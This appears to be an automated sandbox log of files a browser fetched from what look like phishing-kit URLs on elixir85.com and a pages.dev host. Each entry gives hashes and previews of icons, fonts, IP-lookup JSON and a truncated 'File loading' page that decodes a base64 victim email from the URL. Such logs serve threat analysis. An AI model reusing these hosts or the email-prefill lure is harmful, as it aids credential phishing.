                                                        SHA-256:A7EE799DD5B6F6DBB70B043B766362A6724E71458F9839306C995F06B218C2F8
                                                        SHA-512:2C7095E4B819BC5CAA06811A55C0DAE6706970F981806DCF7FD41F744C1DC6A955657A8E57829B39B376B892E8173E8A41F683D329CFBBD0EC4D4019B10E52FF
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170
                                                        Preview:<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">..<mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff">..<path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 10.335 12.9974C6.89614 14.0647 4.5 17.2233 4.5 20.9412C4.50019 20.968 4.50041 20.9949 4.50066 21.0218C4.50022 21.0574 4.5 21.093 4.5 21.1287C4.55021 28.2609 6.80967 39.1601 18.6091 46.4932C21.8225 48.5023 25.8896 48.5023 29.1532 46.4932C41.053 39.2103 43.3125 28.3111 43.3125 21.1287C43.3125 21.108 43.3124 21.0872 43.3123 21.0665C43.3124 21.0246 43.3125 20.9829 43.3125 20.9412C43.3125 17.3371 41.0055 14.1946 37.6702 13.0618C37.0607 5.27148 31.147 0 23.9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):2905
                                                        Entropy (8bit):3.962263100945339
                                                        Encrypted:false
                                                        SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                        MD5:FE87496CC7A44412F7893A72099C120A
                                                        SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                        SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                        SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text
                                                        Category:downloaded
                                                        Size (bytes):1469
                                                        Entropy (8bit):4.699888190641274
                                                        Encrypted:false
                                                        SSDEEP:24:hYkCRnSKXxQiWksIeWA9bQG0lExOeojTU4miqd4NN:wndrMJkHjTZmrCNN
                                                        MD5:082A6C3E2DA5C84A7999206296C592FE
                                                        SHA1:5BA03EDB1979C0B2550BB579D8CFDADC60C1F414
                                                        SHA-256:2C4C356320D90201AD8BCF1DD16418D247E89849BF00254A6404A95850472D01
                                                        SHA-512:28D1201EE43E0C06FEE2D7057C8BF6C2163AA9F340A9FF837365512B502E89DFECAF64D658B498E8EADEBEF1E5F731B3AF7DA880442CCD65E8FAEEA31200CFC1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://ad4a82ff.fdfsfsfffsffffdfdffdfddfsrfe.pages.dev/favicon.ico
                                                        Preview:<!DOCTYPE html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title>File loading</title>. <script>. // Function to get the value of a parameter from the URL. function getParameterByName(name, url) {. if (!url) url = window.location.href;. name = name.replace(/[\[\]]/g, "\\$&");. var regex = new RegExp("[?&]" + name + "(=([^&#]*)|&|#|$)"),. results = regex.exec(url);. if (!results) return null;. if (!results[2]) return '';. return decodeURIComponent(results[2].replace(/\+/g, " "));. }.. // Get the base64-encoded email parameter from the URL. var base64EmailParam = getParameterByName('email');.. // Decode the base64-encoded email. function decodeEmail(base64Email) {. return atob(base64Email);. }.. // If a base64-encoded email parameter is provided,
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):10796
                                                        Entropy (8bit):7.946024875001343
                                                        Encrypted:false
                                                        SSDEEP:192:aPzBBDKs07GiH528urXXSjD4/voR3Euri/in9Q28oLaIAQLdCYXQIDeoIdv60:aPVBQ7P5nIyjD+oRnr4inJdANuGdC0
                                                        MD5:12BDACC832185D0367ECC23FD24C86CE
                                                        SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                        SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                        SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2446 x 899, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):70712
                                                        Entropy (8bit):6.94130504124589
                                                        Encrypted:false
                                                        SSDEEP:768:lBgPNoDCQcgEBtp8Y/fYous0+W/+hVNpTrP19NhgtJ+6qcHaDCzGoSRug:lBgC+Qoju/szW/SNDaJ+6qc6DESR5
                                                        MD5:F70FF06D19498D80B130EC78176FD3FF
                                                        SHA1:9D8A3B74C5164FF7AE2C7930B6D7B14707B404FC
                                                        SHA-256:DF6DBAB5251E56B405E48AAF57D3CD4188F073FFBA71131FA6CD26E6742923AE
                                                        SHA-512:543151693C3751A7E6B1B6A9EA77B83CFD049BC320EE75B666514076F4C0218E9DC23DA5E6C932B2B8670AA1BE1D4E9A91A889F5C6F0D7B9F9C9FE6694609B31
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/uvrkTtrGLzA9nOtO0uRNX2ukFXM6ttnWjIo6De4Rue8U5rkmnqqgYjP3dvGgTUnVi3jY1Cegh254
                                                        Preview:.PNG........IHDR................... .IDATx....q......!8.on.....{....4{..{U.A!x...t3P.~.S86...N....7USM....p.".?..>.G....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @....... @.......
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):763
                                                        Entropy (8bit):4.73890517681664
                                                        Encrypted:false
                                                        SSDEEP:12:f8+MHx14yOu/hz/zHoaNOU4/c/UddFB6MrYJmV4Mr2iWxmrE2AptAv9VVZ8BHA:k+mx14wxHoaNO38mV5r2ZmrE2sAv9OBg
                                                        MD5:3849201717DD51D96B654574CCED466A
                                                        SHA1:E24F74FECAB382E723EDA00292AA9EC36DC35EC0
                                                        SHA-256:842748142398582957A7231B1D55996C3036ECB3182289C2C0D48A387BB4DBCE
                                                        SHA-512:3153B3DC36715F41F7181E6F332EB4E7CBC60348C7025BE9AC5853FD175E8C72C941CA093D222B9F5AE8D56CDE0A913186FAAEB186E30258AF71F0492EB5DF89
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{. "ip": "8.46.123.33",. "network": "8.46.123.0/24",. "version": "IPv4",. "city": "New York City",. "region": "New York",. "region_code": "NY",. "country": "US",. "country_name": "United States",. "country_code": "US",. "country_code_iso3": "USA",. "country_capital": "Washington",. "country_tld": ".us",. "continent_code": "NA",. "in_eu": false,. "postal": "10069",. "latitude": 40.778,. "longitude": -73.9884,. "timezone": "America/New_York",. "utc_offset": "-0400",. "country_calling_code": "+1",. "currency": "USD",. "currency_name": "Dollar",. "languages": "en-US,es-US,haw,fr",. "country_area": 9629091.0,. "country_population": 327167434,. "asn": "AS3356",. "org": "LEVEL3".}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):104
                                                        Entropy (8bit):4.840199122155243
                                                        Encrypted:false
                                                        SSDEEP:3:CaSbcCNT3EKVEkxhZJSh3EkEkki3kx+BR0:PSbzqKVEkxzQDw+R0
                                                        MD5:021197253B2562210B461059E9AD2DF3
                                                        SHA1:179ECE63910591822F738E8E999028C969C4A832
                                                        SHA-256:29B65BE90398DCE2A43CFB41EF2A4B0E08FACAE58215B1A03DD454D590B16EC9
                                                        SHA-512:512E85D9FB36BE2C9189A3B575A57CECB73FB3B33839CCBF8D56064872C8CD93BBFE9B371A696AEA3E0C325A64DCBEEA2974BFB751576376D158012F9982CA9C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmfw4xVl8sjYBIFDV9X_g0SBQ0TmyRjEjMJE4_CfSlKFYsSBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUN0AJA7BIFDahd43Q=?alt=proto
                                                        Preview:ChIKBw1fV/4NGgAKBw0TmyRjGgAKNgoHDc8jKv8aAAoHDcWTxCQaAAoHDYmlZ8saAAoHDcMZOZAaAAoHDdACQOwaAAoHDahd43QaAA==
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (1476), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):38284
                                                        Entropy (8bit):5.112021368539161
                                                        Encrypted:false
                                                        SSDEEP:192:loogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjftogxp:2DKAaZtJs5odwthx5P6mqjDggJkLLn
                                                        MD5:EA3C880120D132DD7E69D07025F11CF3
                                                        SHA1:466C053FBCC498C1B6D5D57704E579C017EB34B4
                                                        SHA-256:B8FE053E02EE76DF190025778161DDCDF3C7DD888A1432C020842C1F08D77646
                                                        SHA-512:F44047DA2C8FD10F7408B1C95EFA8051FC7C3C8FBEBE1AE4AE0E2BF44F720EF7AFCEC6468809894AC8D542D28AD842651B17E277D0EB343776B0D8DBBD6C5C30
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/abjlZHFJHKoUOtpqyef30
                                                        Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/testweb/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/testweb/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/testweb/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight:
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format, TrueType, length 36696, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):36696
                                                        Entropy (8bit):7.988666025644622
                                                        Encrypted:false
                                                        SSDEEP:768:lvJo4KciQZYjebVq19lKPtHAQ/l4rj2bqkiHShpeSUOR4OqWOgaU:lhH3rVq1PKP432tSSh4SUORHqWcU
                                                        MD5:A69E9AB8AFDD7486EC0749C551051FF2
                                                        SHA1:C34E6AA327B536FB48D1FE03577A47C7EE2231B8
                                                        SHA-256:FD78A1913DB912221B8EAD1E62FAD47D1FF0A9FA6CD88D3B128A721AD91D2FAF
                                                        SHA-512:9A0E4297282542B8813F9CC85B2CCB09663CE281F64503F9A5284631881DA9AACF7649553BF1423D941F01B97E6BC3BA50AB13E55E4B7B61C5AA0A4ADF4D390F
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/45JQQXGinJG902EgrDtnvQTvw65
                                                        Preview:wOFF.......X......6........0...(............DSIG...(............GPOS..........^>....GSUB.............3y.OS/2.......F...`h`{Zcmap...........<.?+.cvt .......0...<(...fpgm............?...gasp................glyf.."0..Tl...h...+head..v....4...6..}.hhea..v....!...$...Zhmtx..v........x;...loca..z|...........tmaxp..~$... ... .-..name..~D.......'....post............1+.,prep.............P..x..\.|U..Nr.^.......DD.T....V...C....U._.N..k.8.m...h.Q.6q....#....Y4l.}3.@ .............Z_....s.....>RD.....J....wR./...#.,<'f....4b..}(....P..\.s.9'.....-.Q..d..H.@%..K+....4U.4...yx.3..DkfJ..3S.H......|..........%.B...........W.~..nN<x.?....}jn...W..M.7...?...:-uAjQ.4J.].vm....H{&...y..@....G...~.......x=.V..g.;..@..J.l...G..L... g*M..h.....Q!}B...Q.m.M...R.5*.JUi*..U_5@]..PW...*5H.VW.k..:5D].nP#..5V=....x.....W/...E5I...NVS.T.u...^U3._...m5G-P...U...Gj.*V..j.Z...j..BJ.._Pw..0..f*...q...q5...'.F=MIj.7..^.f."..K\..pHMC.t.W.Z.Bz...l.+.....e|......B>....1.a,.D.Ej..(.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):1400
                                                        Entropy (8bit):7.808470583085035
                                                        Encrypted:false
                                                        SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                        MD5:333EE830E5AB72C41DD9126A27B4D878
                                                        SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                        SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                        SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):2905
                                                        Entropy (8bit):3.962263100945339
                                                        Encrypted:false
                                                        SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                        MD5:FE87496CC7A44412F7893A72099C120A
                                                        SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                        SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                        SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):1864
                                                        Entropy (8bit):5.222032823730197
                                                        Encrypted:false
                                                        SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                        MD5:BC3D32A696895F78C19DF6C717586A5D
                                                        SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                        SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                        SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):1400
                                                        Entropy (8bit):7.808470583085035
                                                        Encrypted:false
                                                        SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                        MD5:333EE830E5AB72C41DD9126A27B4D878
                                                        SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                        SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                        SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228
                                                        Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):30
                                                        Entropy (8bit):3.939572261986723
                                                        Encrypted:false
                                                        SSDEEP:3:pW9uXMRgvn:pWMXD
                                                        MD5:9ABF99E9F4E068283E232A2F3A978BD8
                                                        SHA1:739A42442ED8C00B7E743CCB27B4CE57CC8BC478
                                                        SHA-256:755ABF6E78956DFE1A010A086E287F712B051C2DB2D57ABC47632DDC58CCA607
                                                        SHA-512:48E029D481A173882AE839AA86E1C7FAC52F06019E64E5537AEDC128B36212368FB0B7D2B810781752A62635D8145C39AA2878F014BDC69FF8A0173FA1F504E9
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{. "origin": "8.46.123.33".}.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:downloaded
                                                        Size (bytes):30
                                                        Entropy (8bit):3.939572261986723
                                                        Encrypted:false
                                                        SSDEEP:3:pW9uXMRgvn:pWMXD
                                                        MD5:9ABF99E9F4E068283E232A2F3A978BD8
                                                        SHA1:739A42442ED8C00B7E743CCB27B4CE57CC8BC478
                                                        SHA-256:755ABF6E78956DFE1A010A086E287F712B051C2DB2D57ABC47632DDC58CCA607
                                                        SHA-512:48E029D481A173882AE839AA86E1C7FAC52F06019E64E5537AEDC128B36212368FB0B7D2B810781752A62635D8145C39AA2878F014BDC69FF8A0173FA1F504E9
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://httpbin.org/ip
                                                        Preview:{. "origin": "8.46.123.33".}.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):102180
                                                        Entropy (8bit):5.816247372309998
                                                        Encrypted:false
                                                        SSDEEP:1536:PcclBfsO6izvQr5ZFYF5zRYvCuGs8I44T3T4M/02kAp2dWYrt2Y:P1PfsYzv6VYFhRYr64T3T9BDQdWI4Y
                                                        MD5:2E135CD5930231C6EB08B7EBD91FFF31
                                                        SHA1:F59FC6FFCD6D11CD6AA71554D6D2C06F34AEB82F
                                                        SHA-256:75217A365943B603D1E9D9F1C6C16DB2658C51CA8C6A43DD4258FD9D1CE54456
                                                        SHA-512:DCB28EAA67E691BDD2FDC6A8F3E089E0F1A453533A1A3ED5E69F848DFFB858D3C2CA6F596824006711EFBFDCED0F0AF9F92575F358840E34B9AA7C7311937035
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliw
